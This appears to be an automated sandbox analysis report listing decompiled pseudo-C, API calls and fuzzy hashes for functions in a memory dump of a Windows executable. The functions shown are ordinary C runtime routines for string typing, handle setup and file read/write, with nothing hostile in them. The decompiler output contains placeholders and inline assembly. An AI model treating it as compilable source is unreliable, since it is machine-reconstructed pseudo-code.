Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: e10990471218f4eee640a03b4b3cf7f8be20d995604a06795dde89d490cc6b75
Instruction ID: 15917be9e3d5fae8a9c60e291afe03b7d57137d270f76ff9d6c5c906583fe614
Opcode Fuzzy Hash: e10990471218f4eee640a03b4b3cf7f8be20d995604a06795dde89d490cc6b75
Instruction Fuzzy Hash: 0931F4B35042659ED7207BB59ECC83B769CE749358B11463BF942F32D0E6B88C4192AD

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004051A0(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x40c500);
				_push(E00402C1C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x40f240; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x40f234; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00405450(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00405480(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x40f224; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x40c4e0, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x40c4dc, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x40f240 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x004051a3
0x004051a5
0x004051aa
0x004051b5
0x004051b6
0x004051bd
0x004051c3
0x004051c6
0x004051cf
0x0040520f
0x00405212
0x0040523b
0x00000000
0x00405241
0x00405244
0x00405246
0x0040524b
0x0040524b
0x0040525b
0x00405265
0x0040526b
0x00405270
0x00000000
0x00405272
0x00405272
0x0040527f
0x00405284
0x00405287
0x00405289
0x0040528f
0x004052a4
0x004052aa
0x00000000
0x004052ac
0x004052bb
0x004052c3
0x00000000
0x004052c5
0x004052cd
0x004052cd
0x004052c3
0x004052aa
0x00405270
0x00405214
0x00405214
0x00405219
0x0040521b
0x0040521b
0x0040522d
0x0040522d
0x004051d1
0x004051d4
0x004051d7
0x004051e7
0x00405201
0x004052d5
0x004052d5
0x00405207
0x00405209
0x00000000
0x00405209
0x004051e9
0x004051e9
0x0040520a
0x0040520a
0x00000000
0x0040520a
0x004051e7
0x004052dd
0x004052e8

APIs

GetStringTypeW.KERNEL32(00000001,0040C4E0,00000001,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 004051DF
GetStringTypeA.KERNEL32(00000000,00000001,0040C4DC,00000001,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 004051F9
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 0040522D
MultiByteToWideChar.KERNEL32(0040468D,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0040468D,00000001,00000020,00000100,?,00000000), ref: 00405265
MultiByteToWideChar.KERNEL32(0040468D,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0040468D,00000001,00000020,00000100,?), ref: 004052BB
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0040468D,00000001,00000020,00000100,?), ref: 004052CD

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: e27c582503db41e90c66b055a411cf6264e2f174e9b2130c6d3e8f05452b5ab5
Instruction ID: 64456c0fe0b50f4c7e4c0e38b228d1d70926a524e600b3434ff4f111d6d7380b
Opcode Fuzzy Hash: e27c582503db41e90c66b055a411cf6264e2f174e9b2130c6d3e8f05452b5ab5
Instruction Fuzzy Hash: 7F418B71600609EFCB209F949D85AAB3B68FF08750F20467AF911F22D0D3398950CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040293A, Relevance: 7.6, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040293A() {
				signed int* _t35;
				signed int* _t37;
				long _t42;
				signed int _t44;
				signed int _t45;
				int _t46;
				void* _t48;
				void** _t52;
				int _t53;
				int _t54;
				signed int* _t55;
				int _t57;
				void** _t58;
				signed char _t60;
				signed int _t62;
				void* _t66;
				void* _t69;
				signed int _t70;
				int* _t71;
				signed int* _t72;
				void** _t73;
				int _t74;
				intOrPtr* _t75;
				void* _t76;

				_t72 = E00401F8B(0x100);
				if(_t72 == 0) {
					E00401CF7(0x1b);
				}
				 *0x410940 = _t72;
				 *0x410a40 = 0x20;
				_t1 =  &(_t72[0x40]); // 0x100
				_t35 = _t1;
				while(_t72 < _t35) {
					_t72[1] = _t72[1] & 0x00000000;
					 *_t72 =  *_t72 | 0xffffffff;
					_t72[1] = 0xa;
					_t55 =  *0x410940; // 0x21e0ef0
					_t72 =  &(_t72[2]);
					_t35 =  &(_t55[0x40]);
				}
				GetStartupInfoA(_t76 + 0x10);
				__eflags =  *((short*)(_t76 + 0x42));
				if( *((short*)(_t76 + 0x42)) == 0) {
					L25:
					_t57 = 0;
					__eflags = 0;
					do {
						_t37 =  *0x410940; // 0x21e0ef0
						__eflags =  *(_t37 + _t57 * 8) - 0xffffffff;
						_t73 = _t37 + _t57 * 8;
						if( *(_t37 + _t57 * 8) != 0xffffffff) {
							_t32 =  &(_t73[1]);
							 *_t32 = _t73[1] | 0x00000080;
							__eflags =  *_t32;
							goto L37;
						}
						__eflags = _t57;
						_t73[1] = 0x81;
						if(_t57 != 0) {
							asm("sbb eax, eax");
							_t42 =  ~(_t57 - 1) + 0xfffffff5;
							__eflags = _t42;
						} else {
							_t42 = 0xfffffff6;
						}
						_t69 = GetStdHandle(_t42);
						__eflags = _t69 - 0xffffffff;
						if(_t69 == 0xffffffff) {
							L33:
							_t73[1] = _t73[1] | 0x00000040;
						} else {
							_t44 = GetFileType(_t69);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L33;
							}
							_t45 = _t44 & 0x000000ff;
							 *_t73 = _t69;
							__eflags = _t45 - 2;
							if(_t45 != 2) {
								__eflags = _t45 - 3;
								if(_t45 == 3) {
									_t73[1] = _t73[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t57 = _t57 + 1;
						__eflags = _t57 - 3;
					} while (_t57 < 3);
					return SetHandleCount( *0x410a40);
				}
				_t46 =  *(_t76 + 0x44);
				__eflags = _t46;
				if(_t46 == 0) {
					goto L25;
				}
				_t74 =  *_t46;
				_t75 = _t46 + 4;
				__eflags = _t74 - 0x800;
				_t58 = _t74 + _t75;
				if(_t74 >= 0x800) {
					_t74 = 0x800;
				}
				__eflags =  *0x410a40 - _t74; // 0x20
				if(__eflags >= 0) {
					L18:
					_t70 = 0;
					__eflags = _t74;
					if(_t74 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t48 =  *_t58;
						__eflags = _t48 - 0xffffffff;
						if(_t48 == 0xffffffff) {
							goto L24;
						}
						_t60 =  *_t75;
						__eflags = _t60 & 0x00000001;
						if((_t60 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t60 & 0x00000008;
						if((_t60 & 0x00000008) != 0) {
							L23:
							_t62 = _t70 & 0x0000001f;
							__eflags = _t62;
							_t52 = 0x410940[_t70 >> 5] + _t62 * 8;
							 *_t52 =  *_t58;
							_t52[1] =  *_t75;
							goto L24;
						}
						_t53 = GetFileType(_t48);
						__eflags = _t53;
						if(_t53 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_t70 = _t70 + 1;
						_t75 = _t75 + 1;
						_t58 =  &(_t58[1]);
						__eflags = _t70 - _t74;
					} while (_t70 < _t74);
					goto L25;
				} else {
					_t71 = 0x410944;
					while(1) {
						_t54 = E00401F8B(0x100);
						__eflags = _t54;
						if(_t54 == 0) {
							break;
						}
						 *0x410a40 =  *0x410a40 + 0x20;
						__eflags =  *0x410a40;
						 *_t71 = _t54;
						_t10 = _t54 + 0x100; // 0x100
						_t66 = _t10;
						while(1) {
							__eflags = _t54 - _t66;
							if(_t54 >= _t66) {
								break;
							}
							 *(_t54 + 4) =  *(_t54 + 4) & 0x00000000;
							 *_t54 =  *_t54 | 0xffffffff;
							 *((char*)(_t54 + 5)) = 0xa;
							_t54 = _t54 + 8;
							_t66 =  *_t71 + 0x100;
						}
						_t71 =  &(_t71[1]);
						__eflags =  *0x410a40 - _t74; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t74 =  *0x410a40; // 0x20
					goto L18;
				}
			}

0x0040294b
0x00402950
0x00402954
0x00402959
0x0040295a
0x00402960
0x0040296a
0x0040296a
0x00402970
0x00402974
0x00402978
0x0040297b
0x0040297f
0x00402984
0x00402987
0x00402987
0x00402993
0x00402999
0x0040299f
0x00402a6a
0x00402a6a
0x00402a6a
0x00402a6c
0x00402a6c
0x00402a71
0x00402a75
0x00402a78
0x00402ac7
0x00402ac7
0x00402ac7
0x00000000
0x00402ac7
0x00402a7a
0x00402a7c
0x00402a80
0x00402a8c
0x00402a8e
0x00402a8e
0x00402a82
0x00402a84
0x00402a84
0x00402a98
0x00402a9a
0x00402a9d
0x00402ab6
0x00402ab6
0x00402a9f
0x00402aa0
0x00402aa6
0x00402aa8
0x00000000
0x00000000
0x00402aaa
0x00402aaf
0x00402ab1
0x00402ab4
0x00402abc
0x00402abf
0x00402ac1
0x00402ac1
0x00000000
0x00402abf
0x00000000
0x00402ab4
0x00402acb
0x00402acb
0x00402acc
0x00402acc
0x00402ae4
0x00402ae4
0x004029a5
0x004029a9
0x004029ab
0x00000000
0x00000000
0x004029b1
0x004029b3
0x004029bb
0x004029bd
0x004029c0
0x004029c2
0x004029c2
0x004029c4
0x004029ca
0x00402a1e
0x00402a1e
0x00402a20
0x00402a22
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a24
0x00402a24
0x00402a24
0x00402a26
0x00402a29
0x00000000
0x00000000
0x00402a2b
0x00402a2e
0x00402a31
0x00000000
0x00000000
0x00402a33
0x00402a36
0x00402a43
0x00402a4a
0x00402a4a
0x00402a54
0x00402a59
0x00402a5e
0x00000000
0x00402a5e
0x00402a39
0x00402a3f
0x00402a41
0x00000000
0x00000000
0x00000000
0x00402a61
0x00402a61
0x00402a62
0x00402a63
0x00402a66
0x00402a66
0x00000000
0x004029cc
0x004029cc
0x004029d1
0x004029d6
0x004029db
0x004029de
0x00000000
0x00000000
0x004029e0
0x004029e0
0x004029e7
0x004029e9
0x004029e9
0x004029ef
0x004029ef
0x004029f1
0x00000000
0x00000000
0x004029f3
0x004029f7
0x004029fa
0x00402a00
0x00402a03
0x00402a03
0x00402a0b
0x00402a0e
0x00402a14
0x00000000
0x00000000
0x00000000
0x00402a16
0x00402a18
0x00000000
0x00402a18

APIs

GetStartupInfoA.KERNEL32(?), ref: 00402993
GetFileType.KERNEL32(00000800), ref: 00402A39
GetStdHandle.KERNEL32(-000000F6), ref: 00402A92
GetFileType.KERNEL32(00000000), ref: 00402AA0
SetHandleCount.KERNEL32 ref: 00402AD7

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 21304abf6035ba630a8ba74f897e8f81a701d6263ef7a51adce51133c830e627
Instruction ID: 4fb306a545ba46709a4a87eab80b07efaed9024688bd363fa0b3a96a0d215bd4
Opcode Fuzzy Hash: 21304abf6035ba630a8ba74f897e8f81a701d6263ef7a51adce51133c830e627
Instruction Fuzzy Hash: 475129717043418BD7318B28CE4C7667B90AB51734F19873AE89AF73E1DBB88945CB19

Uniqueness

Uniqueness Score: -1.00%

Function 004078FE, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004078FE(void* __ecx) {
				signed int _t22;
				signed char _t36;
				char* _t43;
				void* _t45;

				E00408888(E0040B0B4, _t45);
				_t22 =  *(_t45 + 8) & 0x00000007;
				 *(__ecx + 4) = _t22;
				_t36 =  *(__ecx + 8) & _t22;
				if(_t36 != 0) {
					if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
						E004090B8(0, 0);
					}
					_t52 = _t36 & 0x00000004;
					if((_t36 & 0x00000004) == 0) {
						__eflags = _t36 & 0x00000002;
						_t43 = "ios::failbit set";
						if((_t36 & 0x00000002) == 0) {
							_t43 = "ios::eofbit set";
						}
					} else {
						_t43 = "ios::badbit set";
					}
					 *((char*)(_t45 - 0x1c)) =  *((intOrPtr*)(_t45 + 0xf));
					E00406739(_t45 - 0x1c, 0);
					E00406965(_t45 - 0x1c, _t45, _t43, E00404880(_t43));
					_push(_t45 - 0x1c);
					 *((intOrPtr*)(_t45 - 4)) = 0;
					E0040799A(_t45 - 0x38, _t52);
					 *((intOrPtr*)(_t45 - 0x38)) = 0x40c66c;
					_t22 = E004090B8(_t45 - 0x38, 0x40d1e8);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t22;
			}

0x00407903
0x0040790f
0x00407912
0x00407918
0x0040791a
0x00407921
0x00407925
0x00407925
0x0040792a
0x0040792e
0x00407937
0x0040793a
0x0040793f
0x00407941
0x00407941
0x00407930
0x00407930
0x00407930
0x0040794d
0x00407950
0x00407961
0x0040796c
0x0040796d
0x00407970
0x0040797e
0x00407985
0x0040798a
0x0040798f
0x00407997

APIs

__EH_prolog.LIBCMT ref: 00407903

Part of subcall function 004090B8: RaiseException.KERNEL32(0040828E,00000000,?,0040C71C,?,invalid string position,0040828E,00000000,0040D538,?,invalid string position), ref: 004090E6

Strings

ios::eofbit set, xrefs: 00407941, 00407955, 0040795D
ios::badbit set, xrefs: 00407930
ios::failbit set, xrefs: 0040793A

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: 0f6f13d595c3a80316dfa137bb9a7c2643a4617bbc0457f887eee3fc38aa15ce
Instruction ID: 3f8e5bf287ffcbc50aa536490ca7a4ac317a3bc69af6bacfd2d206bc898e6d63
Opcode Fuzzy Hash: 0f6f13d595c3a80316dfa137bb9a7c2643a4617bbc0457f887eee3fc38aa15ce
Instruction Fuzzy Hash: F91170F2C01148AAD714EBA5C4C1EEE77689B05318F04D03FE955772C2E73C5905CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A925, Relevance: 6.2, APIs: 4, Instructions: 174
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A925(signed int _a4, void* _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				long _t74;
				signed int _t77;
				intOrPtr _t83;
				signed char _t84;
				signed char _t86;
				long _t87;
				void _t89;
				signed char _t91;
				char _t99;
				long _t102;
				void _t103;
				intOrPtr* _t105;
				void* _t106;
				signed char* _t107;
				long _t109;
				signed int _t112;
				signed char _t114;
				long _t115;
				void* _t116;
				signed int _t118;
				signed int _t120;
				signed char* _t121;
				void* _t122;
				void* _t123;

				_t118 = _a4;
				_t123 = _t118 -  *0x410a40; // 0x20
				if(_t123 >= 0) {
					L44:
					 *0x40efa8 =  *0x40efa8 & 0x00000000;
					 *0x40efa4 = 9;
					L45:
					return _t74 | 0xffffffff;
				}
				_t77 = _t118 >> 5;
				_t120 = (_t118 & 0x0000001f) << 3;
				_t105 = 0x410940 + _t77 * 4;
				_t74 =  *((intOrPtr*)(0x410940 + _t77 * 4)) + _t120;
				_t114 =  *((intOrPtr*)(_t74 + 4));
				if((_t114 & 0x00000001) == 0) {
					goto L44;
				}
				_v12 = _v12 & 0x00000000;
				_t116 = _a8;
				_t106 = _t116;
				if(_a12 == 0 || (_t114 & 0x00000002) != 0) {
					L11:
					return 0;
				} else {
					if((_t114 & 0x00000048) != 0) {
						_t103 =  *((intOrPtr*)(_t74 + 5));
						if(_t103 != 0xa) {
							_a12 = _a12 - 1;
							 *_t116 = _t103;
							_t106 = _t116 + 1;
							_v12 = 1;
							 *((char*)( *_t105 + _t120 + 5)) = 0xa;
						}
					}
					if(ReadFile( *( *_t105 + _t120), _t106, _a12,  &_v16, 0) != 0) {
						_t83 =  *_t105;
						_t115 = _v16;
						_v12 = _v12 + _t115;
						_t31 = _t120 + 4; // 0x4
						_t107 = _t83 + _t31;
						_t84 =  *((intOrPtr*)(_t83 + _t120 + 4));
						if((_t84 & 0x00000080) == 0) {
							L43:
							return _v12;
						}
						if(_t115 == 0 ||  *_t116 != 0xa) {
							_t86 = _t84 & 0x000000fb;
						} else {
							_t86 = _t84 | 0x00000004;
						}
						 *_t107 = _t86;
						_t87 = _a8;
						_a12 = _t87;
						_t109 = _v12 + _t87;
						_v12 = _t109;
						if(_t87 >= _t109) {
							L42:
							_v12 = _t116 - _a8;
							goto L43;
						} else {
							while(1) {
								_t89 =  *_a12;
								if(_t89 == 0x1a) {
									break;
								}
								if(_t89 == 0xd) {
									if(_a12 >= _t109 - 1) {
										_a12 = _a12 + 1;
										if(ReadFile( *( *_t105 + _t120),  &_v5, 1,  &_v16, 0) != 0 || GetLastError() == 0) {
											if(_v16 == 0) {
												goto L36;
											}
											if(( *( *_t105 + _t120 + 4) & 0x00000048) == 0) {
												if(_t116 != _a8 || _v5 != 0xa) {
													E0040A0DE(_a4, 0xffffffff, 1);
													_t122 = _t122 + 0xc;
													if(_v5 == 0xa) {
														goto L38;
													}
													goto L36;
												} else {
													L34:
													 *_t116 = 0xa;
													goto L37;
												}
											}
											_t99 = _v5;
											if(_t99 == 0xa) {
												goto L34;
											}
											 *_t116 = 0xd;
											_t116 = _t116 + 1;
											 *((char*)( *_t105 + _t120 + 5)) = _t99;
											goto L38;
										} else {
											L36:
											 *_t116 = 0xd;
											L37:
											_t116 = _t116 + 1;
											L38:
											_t109 = _v12;
											if(_a12 < _t109) {
												continue;
											}
											goto L42;
										}
									}
									_t102 = _a12 + 1;
									if( *_t102 != 0xa) {
										 *_t116 = 0xd;
										_t116 = _t116 + 1;
										_a12 = _t102;
										goto L38;
									}
									_a12 = _a12 + 2;
									goto L34;
								}
								 *_t116 = _t89;
								_t116 = _t116 + 1;
								_a12 = _a12 + 1;
								goto L38;
							}
							_t121 =  *_t105 + _t120 + 4;
							_t91 =  *_t121;
							if((_t91 & 0x00000040) == 0) {
								 *_t121 = _t91 | 0x00000002;
							}
							goto L42;
						}
					}
					_t74 = GetLastError();
					_t112 = 5;
					if(_t74 != _t112) {
						if(_t74 != 0x6d) {
							_t74 = E0040A8BE(_t74);
							goto L45;
						}
						goto L11;
					}
					 *0x40efa4 = 9;
					 *0x40efa8 = _t112;
					goto L45;
				}
			}

0x0040a92d
0x0040a931
0x0040a937
0x0040ab02
0x0040ab02
0x0040ab09
0x0040ab13
0x00000000
0x0040ab13
0x0040a942
0x0040a945
0x0040a948
0x0040a956
0x0040a958
0x0040a95e
0x00000000
0x00000000
0x0040a964
0x0040a968
0x0040a96f
0x0040a971
0x0040a9da
0x00000000
0x0040a978
0x0040a97b
0x0040a97d
0x0040a982
0x0040a984
0x0040a987
0x0040a98b
0x0040a98e
0x0040a995
0x0040a995
0x0040a982
0x0040a9b1
0x0040a9ed
0x0040a9ef
0x0040a9f2
0x0040a9f5
0x0040a9f5
0x0040a9f9
0x0040a9ff
0x0040aafd
0x00000000
0x0040aafd
0x0040aa07
0x0040aa12
0x0040aa0e
0x0040aa0e
0x0040aa0e
0x0040aa14
0x0040aa16
0x0040aa1c
0x0040aa1f
0x0040aa23
0x0040aa26
0x0040aaf7
0x0040aafa
0x00000000
0x0040aa2c
0x0040aa2c
0x0040aa2f
0x0040aa33
0x00000000
0x00000000
0x0040aa3b
0x0040aa4c
0x0040aa6c
0x0040aa82
0x0040aa92
0x00000000
0x00000000
0x0040aa9b
0x0040aab3
0x0040aac7
0x0040aacc
0x0040aad3
0x00000000
0x00000000
0x00000000
0x0040aabb
0x0040aabb
0x0040aabb
0x00000000
0x0040aabb
0x0040aab3
0x0040aa9d
0x0040aaa2
0x00000000
0x00000000
0x0040aaa4
0x0040aaa9
0x0040aaaa
0x00000000
0x0040aad5
0x0040aad5
0x0040aad5
0x0040aad8
0x0040aad8
0x0040aad9
0x0040aad9
0x0040aadf
0x00000000
0x00000000
0x00000000
0x0040aae5
0x0040aa82
0x0040aa51
0x0040aa55
0x0040aa5d
0x0040aa60
0x0040aa61
0x00000000
0x0040aa61
0x0040aa57
0x00000000
0x0040aa57
0x0040aa3d
0x0040aa3f
0x0040aa40
0x00000000
0x0040aa40
0x0040aae9
0x0040aaed
0x0040aaf1
0x0040aaf5
0x0040aaf5
0x00000000
0x0040aaf1
0x0040aa26
0x0040a9b3
0x0040a9bb
0x0040a9be
0x0040a9d8
0x0040a9e2
0x00000000
0x0040a9e7
0x00000000
0x0040a9d8
0x0040a9c0
0x0040a9ca
0x00000000
0x0040a9ca

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 0040A9A9
GetLastError.KERNEL32(?,?), ref: 0040A9B3
ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?), ref: 0040AA7A
GetLastError.KERNEL32(?,?), ref: 0040AA84

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202789296.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.202798042.000000000040E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.202804109.0000000000413000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 3bcf9c374ecf940d791d04bface5097fc459326c3e5ec510815806064e1d019f
Instruction ID: 7d422fff0f27af7aa959a9ea3cedd1a765cd8bd906040cff84822314267a9bfe
Opcode Fuzzy Hash: 3bcf9c374ecf940d791d04bface5097fc459326c3e5ec510815806064e1d019f
Instruction Fuzzy Hash: 5461E470704385DFDB158F58C9447AA3BB0AB12304F1444BBE452AB3D2D3B89966DB1B

Uniqueness

Uniqueness Score: -1.00%

Function 00409C8D, Relevance: 6.1, APIs: 4, Instructions: 139
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409C8D(long _a4, void* _a8, long _a12) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				intOrPtr _v20;
				void _v1048;
				signed char _t58;
				void** _t64;
				intOrPtr _t67;
				char* _t72;
				long _t79;
				signed char* _t83;
				signed int _t84;
				char _t90;
				struct _OVERLAPPED* _t94;
				long _t96;
				signed int _t99;
				void* _t102;

				_t84 = _a4;
				_t102 = _t84 -  *0x410a40; // 0x20
				if(_t102 >= 0) {
					L30:
					 *0x40efa8 =  *0x40efa8 & 0x00000000;
					 *0x40efa4 = 9;
					L31:
					return _t58 | 0xffffffff;
				}
				_t83 = 0x410940 + (_t84 >> 5) * 4;
				_t99 = (_t84 & 0x0000001f) << 3;
				_t58 =  *((intOrPtr*)( *_t83 + _t99 + 4));
				if((_t58 & 0x00000001) == 0) {
					goto L30;
				}
				_t94 = 0;
				_v12 = 0;
				_v20 = 0;
				if(_a12 != 0) {
					if((_t58 & 0x00000020) != 0) {
						E0040A0DE(_t84, 0, 2);
					}
					_t64 =  *_t83 + _t99;
					if((_t64[1] & 0x00000080) == 0) {
						if(WriteFile( *_t64, _a8, _a12,  &_v16, _t94) == 0) {
							_a4 = GetLastError();
						} else {
							_a4 = _t94;
							_v12 = _v16;
						}
						L17:
						_t67 = _v12;
						if(_t67 != _t94) {
							return _t67 - _v20;
						}
						if(_a4 == _t94) {
							L26:
							_t58 =  *_t83;
							if(( *(_t58 + _t99 + 4) & 0x00000040) == 0) {
								L28:
								 *0x40efa4 = 0x1c;
								 *0x40efa8 = _t94;
								goto L31;
							}
							_t58 = _a8;
							if( *_t58 == 0x1a) {
								goto L3;
							}
							goto L28;
						}
						_t58 = 5;
						if(_a4 != _t58) {
							_t58 = E0040A8BE(_a4);
						} else {
							 *0x40efa4 = 9;
							 *0x40efa8 = _t58;
						}
						goto L31;
					}
					_v8 = _a8;
					_a4 = _t94;
					if(_a12 <= _t94) {
						goto L26;
					} else {
						goto L8;
					}
					do {
						L8:
						_t72 =  &_v1048;
						while(_v8 - _a8 < _a12) {
							_v8 = _v8 + 1;
							_t90 =  *_v8;
							if(_t90 == 0xa) {
								_v20 = _v20 + 1;
								 *_t72 = 0xd;
								_t72 = _t72 + 1;
							}
							 *_t72 = _t90;
							_t72 = _t72 + 1;
							if(_t72 -  &_v1048 < 0x400) {
								continue;
							} else {
								break;
							}
						}
						_t96 = _t72 -  &_v1048;
						if(WriteFile( *( *_t83 + _t99),  &_v1048, _t96,  &_v16, 0) == 0) {
							_a4 = GetLastError();
							break;
						}
						_t79 = _v16;
						_v12 = _v12 + _t79;
					} while (_t79 >= _t96 && _v8 - _a8 < _a12);
					_t94 = 0;
					goto L17;
				}
				L3:
				return 0;
			}

0x00409c96
0x00409c9a
0x00409ca2
0x00409e21
0x00409e21
0x00409e28
0x00409e32
0x00000000
0x00409e32
0x00409cb2
0x00409cb9
0x00409cbe
0x00409cc4
0x00000000
0x00000000
0x00409cca
0x00409ccf
0x00409cd2
0x00409cd5
0x00409ce0
0x00409ce6
0x00409ceb
0x00409cf0
0x00409cf6
0x00409dd2
0x00409de5
0x00409dd4
0x00409dd7
0x00409dda
0x00409dda
0x00409d86
0x00409d86
0x00409d8b
0x00000000
0x00409e1c
0x00409d94
0x00409df5
0x00409df5
0x00409dfc
0x00409e0a
0x00409e0a
0x00409e14
0x00000000
0x00409e14
0x00409dfe
0x00409e04
0x00000000
0x00000000
0x00000000
0x00409e04
0x00409d98
0x00409d9c
0x00409ded
0x00409d9e
0x00409d9e
0x00409da8
0x00409da8
0x00000000
0x00409d9c
0x00409d02
0x00409d05
0x00409d08
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d0e
0x00409d0e
0x00409d0e
0x00409d14
0x00409d22
0x00409d25
0x00409d2a
0x00409d2c
0x00409d2f
0x00409d32
0x00409d32
0x00409d33
0x00409d35
0x00409d46
0x00000000
0x00000000
0x00000000
0x00000000
0x00409d46
0x00409d50
0x00409d6d
0x00409db8
0x00000000
0x00409db8
0x00409d6f
0x00409d72
0x00409d75
0x00409d84
0x00000000
0x00409d84
0x00409cd7
0x00000000

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,?,?), ref: 00409D65

Memory Dump Source

Source File: 00000001.00000002.202773775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.202767480.0000000000400000.00000002.00020000.sdmp Download File
